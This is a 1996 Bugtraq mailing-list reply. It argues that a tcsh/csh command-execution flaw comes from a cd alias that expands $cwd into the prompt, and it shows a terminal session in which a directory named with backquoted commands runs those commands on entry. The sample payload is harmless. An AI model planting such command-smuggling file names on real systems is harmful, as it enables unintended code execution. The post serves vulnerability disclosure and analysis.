Home page logo

bugtraq logo Bugtraq mailing list archives

Re: tee see shell problems
From: szabo_p () maths su oz au (Paul Szabo)
Date: Wed, 18 Sep 1996 10:44:09 +1000

A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed
out with BSDI anyway.) that allows the execution of arbitrary commands
when changing into directories that are enclosed with back tic's.

It seems to me that the problem may be with the way you define your cd
command: surely it is the expansion of $cwd, if containing backquotes, that
does the damage. (csh is known to do several passes of variable and command
substitution.) I have the following under /bin/csh, both with Apollo
Domain/OS and DEC Alpha OSF/1 (dUNIX v3.2 or v4.0):

tmp% pwd
tmp% which cd
alias/cd 'chdir !*; set prompt="$cwd:t% "'
tmp% mkdir '`echo you lose; touch silly`'
tmp% ls -l
total 1
drwx------   2 psz      system       512 Sep 18 10:28 `echo you lose; touch silly`
tmp% cd *echo*
you lose% pwd
/tmp/`echo you lose; touch silly`
you lose% ls -l
total 0
-rw-------   1 psz      system         0 Sep 18 10:28 silly

Paul Szabo - System Manager   //        School of Mathematics and Statistics
psz () maths usyd edu au         //   University of Sydney, NSW 2006, Australia

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]